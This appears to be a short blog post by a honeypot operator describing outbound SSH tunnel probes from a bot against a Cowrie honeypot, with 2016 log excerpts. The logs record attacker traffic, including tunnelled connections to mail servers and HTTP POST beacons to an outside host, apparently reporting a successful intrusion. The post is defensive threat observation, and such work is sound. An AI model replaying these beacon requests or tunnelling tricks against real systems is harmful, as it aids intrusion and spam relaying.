Honeynet outbound probes
My Cowrie honeypot is now seeing a surge of outbound SSH tunnel probes, both towards different mail servers but also towards a specific web server, probably with the purpose of informing about a successful intrusion. The honeypot has seen outbound attempts before, but not as persistent as with this bot from .ru.
Cowrie fakes successful SSH tunneling, so the bot is at least kept somewhat busy. The honeypot is also in a very tight network environment with limited possibilities for outbound connections.
Here are some examples, formatted for readability:
2016-02-22 01:43:00+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 69.50.231.136:25 2016-02-22 01:43:01+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 202.108.6.242:587 2016-02-22 01:43:54+0100 [SSHChannel None (883) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 64.233.164.108:465 with data '\x16\x03\x01\x00S\x01\x00\x00O\x03\x01V\x15\xbc\xc0\x0c \x8fK\xf4\x9d\xb4\xecx\xaf\x13t;\xdeR\xf6c\r6\x93sv\xc7 \xacXq\xd0\xe8\x02\x00\x00(\x009\x008\x005\x00\x16\x00 \x13\x00\n\x003\x002\x00/\x00\x07\x00\x05\x00\x04\x00 \x15\x00\x12\x00\t\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x01\x00' 2016-02-22 02:00:28+0100 [SSHChannel None (979) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 37.1.206.139:25000 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\n Connection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\n' 2016-02-22 03:39:18+0100 [SSHChannel None (0) on SSHService ssh-connection on HoneyPotTransport,1589,193.169.52.212] direct-tcp forward to 37.1.206.139:80 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\n Connection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\n data=ffddaffeccedabae'